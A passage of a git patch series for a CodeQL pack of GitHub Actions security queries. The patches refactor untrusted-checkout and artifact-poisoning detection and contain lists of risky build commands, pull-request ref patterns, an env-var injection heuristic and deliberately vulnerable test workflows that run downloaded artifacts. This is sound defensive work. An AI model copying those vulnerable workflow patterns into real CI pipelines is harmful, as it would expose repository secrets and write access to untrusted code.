or labelEvent(context) and flag = "label" diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 1710768761fe..3800ce9e85ca 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.18 +version: 0.0.19 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 24f07dafe898..c431636c96a0 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.18 +version: 0.0.19 groups: - actions - queries From 9843f375ee7acc33f2d26a268d48d10e031c0a44 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 30 Apr 2024 12:20:53 +0200 Subject: [PATCH 228/707] ignore runtime info for pull_request triggered workflows --- ql/lib/codeql/actions/ast/internal/Ast.qll | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 0c53dae63717..0cbb8ab10ed9 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -635,19 +635,22 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Holds if the workflow is privileged. */ predicate isPrivileged() { - // The job has a permission to write to some scope + // the job has an explicit write permission this.getPermissions().getAPermission() = "write" or - // The job accesses a secret + // the job accesses a secret other than GITHUB_TOKEN exists(SecretsExpressionImpl expr | expr.getEnclosingJob() = this and not expr.getFieldName() = "GITHUB_TOKEN" ) or - // The effective permissions have write access - exists(string path, string name, string secrets_source, string perms | - workflowDataModel(path, _, name, secrets_source, perms, _) and + // the effective permissions have write access + exists(string path, string trigger, string name, string secrets_source, string perms | + workflowDataModel(path, trigger, name, secrets_source, perms, _) and path.trim() = this.getLocation().getFile().getRelativePath() and name.trim().matches(this.getId() + "%") and + // We cannot trust the permissions for pull_request events since they depend on the + // location of the head branch + not trigger.trim() = "pull_request" and ( secrets_source.trim().toLowerCase() = "actions" or perms.toLowerCase().matches("%write%") From 16c77cbe255a72c263bcdf63ac93ad8b7c12f06c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 4 May 2024 23:27:26 +0200 Subject: [PATCH 229/707] Refactor untrusted checkout queries --- .../security/ArtifactPoisoningQuery.qll | 85 +------ .../actions/security/PoisonableSteps.qll | 64 +++++ .../security/UntrustedCheckoutQuery.qll | 229 ++++++++++++++++++ ql/lib/qlpack.yml | 2 +- ql/src/Security/CWE-829/UntrustedCheckout.ql | 150 ------------ ...dCheckout.md => UntrustedCheckoutError.md} | 0 .../CWE-829/UntrustedCheckoutError.ql | 28 +++ .../CWE-829/UntrustedCheckoutWarning.md | 0 .../CWE-829/UntrustedCheckoutWarning.ql | 28 +++ ql/src/qlpack.yml | 2 +- .../.github/workflows/artifactpoisoning21.yml | 2 +- .../.github/workflows/artifactpoisoning22.yml | 2 +- .../CWE-829/ArtifactPoisoning.expected | 8 +- .../PrivilegedArtifactPoisoning.expected | 12 +- .../Security/CWE-829/UntrustedCheckout.qlref | 1 - .../CWE-829/UntrustedCheckoutError.expected | 6 + .../CWE-829/UntrustedCheckoutError.qlref | 1 + ...cted => UntrustedCheckoutWarning.expected} | 6 - .../CWE-829/UntrustedCheckoutWarning.qlref | 1 + 19 files changed, 383 insertions(+), 244 deletions(-) create mode 100644 ql/lib/codeql/actions/security/PoisonableSteps.qll create mode 100644 ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll delete mode 100644 ql/src/Security/CWE-829/UntrustedCheckout.ql rename ql/src/Security/CWE-829/{UntrustedCheckout.md => UntrustedCheckoutError.md} (100%) create mode 100644 ql/src/Security/CWE-829/UntrustedCheckoutError.ql create mode 100644 ql/src/Security/CWE-829/UntrustedCheckoutWarning.md create mode 100644 ql/src/Security/CWE-829/UntrustedCheckoutWarning.ql delete mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckout.qlref create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.expected create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.qlref rename ql/test/query-tests/Security/CWE-829/{UntrustedCheckout.expected => UntrustedCheckoutWarning.expected} (79%) create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.qlref diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 8b7eb51276d9..3635004bc318 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -3,6 +3,7 @@ private import codeql.actions.TaintTracking import codeql.actions.DataFlow private import codeql.actions.dataflow.ExternalFlow import codeql.actions.dataflow.FlowSources +import codeql.actions.security.PoisonableSteps string unzipRegexp() { result = ".*(unzip|tar)\\s+.*" } @@ -228,81 +229,19 @@ class DirectArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { } } -abstract class PoisonableStep extends Step { } - -// source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L16 -private string dangerousActions() { - result = - ["pre-commit/action", "oxsecurity/megalinter", "bridgecrewio/checkov-action", "ruby/setup-ruby"] -} - -class DangerousActionUsesStep extends PoisonableStep, UsesStep { - DangerousActionUsesStep() { - exists(UntrustedArtifactDownloadStep step | - step.getAFollowingStep() = this and - this.getCallee() = dangerousActions() - ) - } -} - -// source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L23 -private string dangerousCommands() { - result = - [ - "npm install", "npm run ", "yarn ", "npm ci(\\b|$)", "make ", "terraform plan", - "terraform apply", "gomplate ", "pre-commit run", "pre-commit install", "go generate", - "msbuild ", "mvn ", "./mvnw ", "gradle ", "./gradlew ", "bundle install", "bundle exec ", - "^ant ", "mkdocs build", "pytest" - ] -} - -class BuildRunStep extends PoisonableStep, Run { - BuildRunStep() { - exists(UntrustedArtifactDownloadStep step | - step.getAFollowingStep() = this and - exists( - this.getScript().splitAt("\n").trim().regexpFind("([^a-z]|^)" + dangerousCommands(), _, _) - ) - ) - } -} - -class LocalCommandExecutionRunStep extends PoisonableStep, Run { - LocalCommandExecutionRunStep() { - exists(UntrustedArtifactDownloadStep step | - step.getAFollowingStep() = this and - // Heuristic: - // Run step with a command starting with `./xxxx`, `sh xxxx`, ... - exists( - this.getScript() - .splitAt("\n") - .trim() - .regexpFind("([^a-z]|^)(./|(ba|z|fi)?sh\\s+)" + step.getPath(), _, _) - ) - ) - } -} - -class EnvVarInjectionRunStep extends PoisonableStep, Run { - EnvVarInjectionRunStep() { - exists(UntrustedArtifactDownloadStep step, string value | - step.getAFollowingStep() = this and - // Heuristic: - // Run step with env var definition based on file content. - // eg: `echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV` - // eg: `echo "sha=$(> $GITHUB_ENV` - Utils::writeToGitHubEnv(this, _, value) and - // TODO: add support for other commands like `<`, `jq`, ... - value.regexpMatch(["\\$\\(", "`"] + ["ls\\s+", "cat\\s+", "<"] + ".*" + ["`", "\\)"]) - ) - } -} - class ArtifactPoisoningSink extends DataFlow::Node { ArtifactPoisoningSink() { - exists(PoisonableStep step | - step.(Run).getScriptScalar() = this.asExpr() or - step.(UsesStep) = this.asExpr() + exists(UntrustedArtifactDownloadStep download, PoisonableStep poisonable | + download.getAFollowingStep() = poisonable and + ( + poisonable.(Run).getScriptScalar() = this.asExpr() + or + poisonable.(UsesStep) = this.asExpr() + ) and + ( + not poisonable instanceof LocalCommandExecutionRunStep or + poisonable.(LocalCommandExecutionRunStep).getCommand().matches(download.getPath() + "%") + ) ) } } diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll new file mode 100644 index 000000000000..130879a7cb6a --- /dev/null +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -0,0 +1,64 @@ +import actions + +abstract class PoisonableStep extends Step { } + +// source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L16 +private string dangerousActions() { + result = + ["pre-commit/action", "oxsecurity/megalinter", "bridgecrewio/checkov-action", "ruby/setup-ruby"] +} + +class DangerousActionUsesStep extends PoisonableStep, UsesStep { + DangerousActionUsesStep() { this.getCallee() = dangerousActions() } +} + +// source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L23 +private string dangerousCommands() { + result = + [ + "npm install", "npm run ", "yarn ", "npm ci(\\b|$)", "make ", "terraform plan", + "terraform apply", "gomplate ", "pre-commit run", "pre-commit install", "go generate", + "msbuild ", "mvn ", "./mvnw ", "gradle ", "./gradlew ", "bundle install", "bundle exec ", + "^ant ", "mkdocs build", "pytest" + ] +} + +class BuildRunStep extends PoisonableStep, Run { + BuildRunStep() { + exists( + this.getScript().splitAt("\n").trim().regexpFind("([^a-z]|^)" + dangerousCommands(), _, _) + ) + } +} + +class LocalCommandExecutionRunStep extends PoisonableStep, Run { + string cmd; + + LocalCommandExecutionRunStep() { + // Heuristic: + // Run step with a command starting with `./xxxx`, `sh xxxx`, ... + exists(string line | line = this.getScript().splitAt("\n").trim() | + // ./xxxx + cmd = line.regexpCapture("(^|\\s+)\\.\\/(.*)", 2) + or + // sh xxxx + cmd = line.regexpCapture("(^|\\s+)(ba|z|fi)?sh\\s+(.*)", 3) + ) + } + + string getCommand() { result = cmd } +} + +class EnvVarInjectionRunStep extends PoisonableStep, Run { + EnvVarInjectionRunStep() { + exists(string value | + // Heuristic: + // Run step with env var definition based on file content. + // eg: `echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV` + // eg: `echo "sha=$(> $GITHUB_ENV` + Utils::writeToGitHubEnv(this, _, value) and + // TODO: add support for other commands like `<`, `jq`, ... + value.regexpMatch(["\\$\\(", "`"] + ["ls\\s+", "cat\\s+", "<"] + ".*" + ["`", "\\)"]) + ) + } +} diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll new file mode 100644 index 000000000000..c677915f504c --- /dev/null +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -0,0 +1,229 @@ +import actions +import codeql.actions.DataFlow + +bindingset[s] +predicate containsPullRequestNumber(string s) { + exists( + Utils::normalizeExpr(s) + .regexpFind([ + "\\bgithub\\.event\\.number\\b", "\\bgithub\\.event\\.issue\\.number\\b", + "\\bgithub\\.event\\.pull_request\\.id\\b", + "\\bgithub\\.event\\.pull_request\\.number\\b", + "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.id\\b", + "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.number\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.id\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.number\\b", + "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.id\\b", + "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.number\\b", + // heuristics + "\\bpr_number\\b", "\\bpr_id\\b" + ], _, _) + ) +} + +bindingset[s] +predicate containsHeadSHA(string s) { + exists( + Utils::normalizeExpr(s) + .regexpFind([ + "\\bgithub\\.event\\.pull_request\\.head\\.sha\\b", + "\\bgithub\\.event\\.pull_request\\.merge_commit_sha\\b", + "\\bgithub\\.event\\.workflow_run\\.head_commit\\.id\\b", + "\\bgithub\\.event\\.workflow_run\\.head_sha\\b", + "\\bgithub\\.event\\.check_suite\\.after\\b", + "\\bgithub\\.event\\.check_suite\\.head_commit\\.id\\b", + "\\bgithub\\.event\\.check_suite\\.head_sha\\b", + "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.after\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.head_commit\\.id\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.head_sha\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", + "\\bgithub\\.event\\.check_run\\.head_sha\\b", + "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", + // heuristics + "\\bhead\\.sha\\b", "\\bhead_sha\\b", "\\bpr_head_sha\\b" + ], _, _) + ) +} + +bindingset[s] +predicate containsHeadRef(string s) { + exists( + Utils::normalizeExpr(s) + .regexpFind([ + "\\bgithub\\.event\\.pull_request\\.head\\.ref\\b", "\\bgithub\\.head_ref\\b", + "\\bgithub\\.event\\.workflow_run\\.head_branch\\b", + "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", + "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", + // heuristics + "\\bhead\\.ref\\b", "\\bhead_ref\\b", "\\bpr_head_ref\\b", + // env vars + "\\benv\\.GITHUB_HEAD_REF\\b", + ], _, _) + ) +} + +/** Checkout of a Pull Request HEAD ref */ +abstract class PRHeadCheckoutStep extends Step { } + +/** Checkout of a Pull Request HEAD ref using actions/checkout action */ +class ActionsMutableRefCheckout extends PRHeadCheckoutStep instanceof UsesStep { + ActionsMutableRefCheckout() { + this.getCallee() = "actions/checkout" and + ( + // ref argument contains the PR id/number or head ref/sha + exists(Expression e | + ( + containsHeadRef(e.getExpression()) or + containsPullRequestNumber(e.getExpression()) + ) and + DataFlow::hasLocalFlowExpr(e, this.getArgumentExpr("ref")) + ) + or + // 3rd party actions returning the PR head sha/ref + exists(UsesStep step | + step.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and + // TODO: This should be read step of the head_sha or head_ref output vars + this.getArgument("ref").regexpMatch(".*head_ref.*") and + DataFlow::hasLocalFlowExpr(step, this.getArgumentExpr("ref")) + ) + or + // heuristic base on the step id and field name + exists(StepsExpression e | + this.getArgumentExpr("ref") = e and + ( + e.getStepId().matches(["%ref%", "%branch%"]) or + e.getFieldName().matches(["%ref%", "%branch%"]) + ) + ) + ) + } +} + +/** Checkout of a Pull Request HEAD ref using actions/checkout action */ +class ActionsSHACheckout extends PRHeadCheckoutStep instanceof UsesStep { + ActionsSHACheckout() { + this.getCallee() = "actions/checkout" and + ( + // ref argument contains the PR id/number or head ref/sha + exists(Expression e | + containsHeadSHA(e.getExpression()) and + DataFlow::hasLocalFlowExpr(e, this.getArgumentExpr("ref")) + ) + or + // 3rd party actions returning the PR head sha/ref + exists(UsesStep step | + step.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and + this.getArgument("ref").regexpMatch(".*head_sha.*") and + DataFlow::hasLocalFlowExpr(step, this.getArgumentExpr("ref")) + ) + or + // heuristic base on the step id and field name + exists(StepsExpression e | + this.getArgumentExpr("ref") = e and + ( + e.getStepId().matches(["%sha%", "%commit%"]) or + e.getFieldName().matches(["%sha%", "%commit%"]) + ) + ) + ) + } +} + +/** Checkout of a Pull Request HEAD ref using git within a Run step */ +class GitMutableRefCheckout extends PRHeadCheckoutStep instanceof Run { + GitMutableRefCheckout() { + exists(string line | + this.getScript().splitAt("\n") = line and + line.regexpMatch(".*git\\s+(fetch|pull).*") and + ( + (containsHeadRef(line) or containsPullRequestNumber(line)) + or + exists(string varname, string expr | + expr = this.getInScopeEnvVarExpr(varname).getExpression() and + ( + containsHeadRef(expr) or + containsPullRequestNumber(expr) + ) and + exists(line.regexpFind(varname, _, _)) + ) + ) + ) + } +} + +/** Checkout of a Pull Request HEAD ref using git within a Run step */ +class GitSHACheckout extends PRHeadCheckoutStep instanceof Run { + GitSHACheckout() { + exists(string line | + this.getScript().splitAt("\n") = line and + line.regexpMatch(".*git\\s+(fetch|pull).*") and + ( + containsHeadSHA(line) + or + exists(string varname, string expr | + expr = this.getInScopeEnvVarExpr(varname).getExpression() and + containsHeadSHA(expr) and + exists(line.regexpFind(varname, _, _)) + ) + ) + ) + } +} + +/** Checkout of a Pull Request HEAD ref using gh within a Run step */ +class GhMutableRefCheckout extends PRHeadCheckoutStep instanceof Run { + GhMutableRefCheckout() { + exists(string line | + this.getScript().splitAt("\n") = line and + line.regexpMatch(".*gh\\s+pr\\s+checkout.*") and + ( + (containsHeadRef(line) or containsPullRequestNumber(line)) + or + exists(string varname | + ( + containsHeadRef(this.getInScopeEnvVarExpr(varname).getExpression()) or + containsPullRequestNumber(this.getInScopeEnvVarExpr(varname).getExpression()) + ) and + exists(line.regexpFind(varname, _, _)) + ) + ) + ) + } +} + +/** Checkout of a Pull Request HEAD ref using gh within a Run step */ +class GhSHACheckout extends PRHeadCheckoutStep instanceof Run { + GhSHACheckout() { + exists(string line | + this.getScript().splitAt("\n") = line and + line.regexpMatch(".*gh\\s+pr\\s+checkout.*") and + ( + containsHeadSHA(line) + or + exists(string varname | + containsHeadSHA(this.getInScopeEnvVarExpr(varname).getExpression()) and + exists(line.regexpFind(varname, _, _)) + ) + ) + ) + } +} + +/** An If node that contains an actor, user or label check */ +class ControlCheck extends If { + ControlCheck() { + exists( + Utils::normalizeExpr(this.getCondition()) + .regexpFind([ + "\\bgithub\\.actor\\b", // actor + "\\bgithub\\.triggering_actor\\b", // actor + "\\bgithub\\.event\\.comment\\.user\\.login\\b", //user + "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", //user + "\\bgithub\\.event\\.pull_request\\.labels\\b", // label + "\\bgithub\\.event\\.label\\.name\\b" // label + ], _, _) + ) + } +} diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 3800ce9e85ca..380cfdbd8583 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.19 +version: 0.0.20 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql deleted file mode 100644 index c9cbb0ab13c7..000000000000 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ /dev/null @@ -1,150 +0,0 @@ -/** - * @name Checkout of untrusted code in trusted context - * @description Priveleged workflows have read/write access to the base repository and access to secrets. - * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment - * that is able to push to the base repository and to access secrets. - * @kind problem - * @problem.severity warning - * @precision medium - * @security-severity 9.3 - * @id actions/untrusted-checkout - * @tags actions - * security - * external/cwe/cwe-829 - */ - -import actions -import codeql.actions.DataFlow - -/** An If node that contains an actor, user or label check */ -class ControlCheck extends If { - ControlCheck() { - exists( - Utils::normalizeExpr(this.getCondition()) - .regexpFind([ - "\\bgithub\\.actor\\b", // actor - "\\bgithub\\.triggering_actor\\b", // actor - "\\bgithub\\.event\\.comment\\.user\\.login\\b", //user - "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", //user - "\\bgithub\\.event\\.pull_request\\.labels\\b", // label - "\\bgithub\\.event\\.label\\.name\\b" // label - ], _, _) - ) - } -} - -bindingset[s] -predicate containsHeadRef(string s) { - exists( - Utils::normalizeExpr(s) - .regexpFind([ - "\\bgithub\\.event\\.number\\b", // The pull request number. - "\\bgithub\\.event\\.issue\\.number\\b", // The pull request number on issue_comment. - "\\bgithub\\.event\\.pull_request\\.head\\.ref\\b", // The ref name of head. - "\\bgithub\\.event\\.pull_request\\.head\\.sha\\b", // The commit SHA of head. - "\\bgithub\\.event\\.pull_request\\.id\\b", // The pull request ID. - "\\bgithub\\.event\\.pull_request\\.number\\b", // The pull request number. - "\\bgithub\\.event\\.pull_request\\.merge_commit_sha\\b", // The SHA of the merge commit. - "\\bgithub\\.head_ref\\b", // The head_ref or source branch of the pull request in a workflow run. - "\\bgithub\\.event\\.workflow_run\\.head_branch\\b", // The branch of the head commit. - "\\bgithub\\.event\\.workflow_run\\.head_commit\\.id\\b", // The SHA of the head commit. - "\\bgithub\\.event\\.workflow_run\\.head_sha\\b", // The SHA of the head commit. - "\\benv\\.GITHUB_HEAD_REF\\b", "\\bgithub\\.event\\.check_suite\\.after\\b", - "\\bgithub\\.event\\.check_suite\\.head_sha\\b", - "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", - "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", - "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.id\\b", - "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.number\\b", - "\\bgithub\\.event\\.check_run\\.check_suite\\.after\\b", - "\\bgithub\\.event\\.check_run\\.check_suite\\.head_sha\\b", - "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", - "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", - "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.id\\b", - "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.number\\b", - "\\bgithub\\.event\\.check_run\\.head_sha\\b", - "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", - "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", - "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.id\\b", - "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.number\\b", - // heuristics - "\\bhead\\.sha\\b", "\\bhead\\.ref\\b", "\\bpr_number\\b", "\\bpr_head_sha\\b" - ], _, _) - ) -} - -/** Checkout of a Pull Request HEAD ref */ -abstract class PRHeadCheckoutStep extends Step { } - -/** Checkout of a Pull Request HEAD ref using actions/checkout action */ -class ActionsCheckout extends PRHeadCheckoutStep instanceof UsesStep { - ActionsCheckout() { - this.getCallee() = "actions/checkout" and - ( - // ref argument contains the head ref - exists(Expression e | - containsHeadRef(e.getExpression()) and - DataFlow::hasLocalFlowExpr(e, this.getArgumentExpr("ref")) - ) - or - // 3rd party actions returning the PR head sha/ref - exists(UsesStep head | - head.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and - DataFlow::hasLocalFlowExpr(head, this.getArgumentExpr("ref")) - ) - or - // heuristic base on the step id and field name - exists(StepsExpression e | - this.getArgumentExpr("ref") = e and - ( - e.getStepId().matches(["%sha%", "%head%", "branch"]) or - e.getFieldName().matches(["%sha%", "%head%", "branch"]) - ) - ) - ) - } -} - -/** Checkout of a Pull Request HEAD ref using git within a Run step */ -class GitCheckout extends PRHeadCheckoutStep instanceof Run { - GitCheckout() { - exists(string line | - this.getScript().splitAt("\n") = line and - line.regexpMatch(".*git\\s+fetch.*") and - ( - containsHeadRef(line) - or - exists(string varname | - containsHeadRef(this.getInScopeEnvVarExpr(varname).getExpression()) and - exists(line.regexpFind(varname, _, _)) - ) - ) - ) - } -} - -/** Checkout of a Pull Request HEAD ref using gh within a Run step */ -class GhCheckout extends PRHeadCheckoutStep instanceof Run { - GhCheckout() { - exists(string line | - this.getScript().splitAt("\n") = line and - line.regexpMatch(".*gh\\s+pr\\s+checkout.*") and - ( - containsHeadRef(line) - or - exists(string varname | - containsHeadRef(this.getInScopeEnvVarExpr(varname).getExpression()) and - exists(line.regexpFind(varname, _, _)) - ) - ) - ) - } -} - -from Workflow w, PRHeadCheckoutStep checkout -where - w.isPrivileged() and - w.getAJob().(LocalJob).getAStep() = checkout and - not exists(ControlCheck check | - checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check - ) -select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow." diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.md b/ql/src/Security/CWE-829/UntrustedCheckoutError.md similarity index 100% rename from ql/src/Security/CWE-829/UntrustedCheckout.md rename to ql/src/Security/CWE-829/UntrustedCheckoutError.md diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutError.ql b/ql/src/Security/CWE-829/UntrustedCheckoutError.ql new file mode 100644 index 000000000000..604acf71cc7b --- /dev/null +++ b/ql/src/Security/CWE-829/UntrustedCheckoutError.ql @@ -0,0 +1,28 @@ +/** + * @name Checkout of untrusted code in trusted context + * @description Priveleged workflows have read/write access to the base repository and access to secrets. + * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment + * that is able to push to the base repository and to access secrets. + * @kind problem + * @problem.severity error + * @precision high + * @security-severity 9.3 + * @id actions/untrusted-checkout + * @tags actions + * security + * external/cwe/cwe-829 + */ + +import actions +import codeql.actions.security.UntrustedCheckoutQuery +import codeql.actions.security.PoisonableSteps + +from Workflow w, PRHeadCheckoutStep checkout +where + w.isPrivileged() and + w.getAJob().(LocalJob).getAStep() = checkout and + checkout.getAFollowingStep() instanceof PoisonableStep and + not exists(ControlCheck check | + checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check + ) +select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow." diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutWarning.md b/ql/src/Security/CWE-829/UntrustedCheckoutWarning.md new file mode 100644 index 000000000000..e69de29bb2d1 diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutWarning.ql b/ql/src/Security/CWE-829/UntrustedCheckoutWarning.ql new file mode 100644 index 000000000000..d8dfd69ad28e --- /dev/null +++ b/ql/src/Security/CWE-829/UntrustedCheckoutWarning.ql @@ -0,0 +1,28 @@ +/** + * @name Checkout of untrusted code in trusted context + * @description Priveleged workflows have read/write access to the base repository and access to secrets. + * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment + * that is able to push to the base repository and to access secrets. + * @kind problem + * @problem.severity warning + * @precision medium + * @security-severity 5.3 + * @id actions/untrusted-checkout + * @tags actions + * security + * external/cwe/cwe-829 + */ + +import actions +import codeql.actions.security.UntrustedCheckoutQuery +import codeql.actions.security.PoisonableSteps + +from Workflow w, PRHeadCheckoutStep checkout +where + w.isPrivileged() and + w.getAJob().(LocalJob).getAStep() = checkout and + not checkout.getAFollowingStep() instanceof PoisonableStep and + not exists(ControlCheck check | + checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check + ) +select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow." diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index c431636c96a0..c5a94e35d4be 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.19 +version: 0.0.20 groups: - actions - queries diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml index 2f39bfd307aa..e73548895d37 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml @@ -17,7 +17,7 @@ jobs: path: foo - name: Run command run: | - ./foo/cmd + sh foo/cmd diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml index 31fa30175512..ac970fff8404 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml @@ -15,7 +15,7 @@ jobs: name: artifact_name workflow: wf.yml - name: Run command - run: ./cmd + run: sh cmd diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected index 3d1df408c3b4..193eee3b66cc 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected @@ -1,8 +1,8 @@ edges | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step 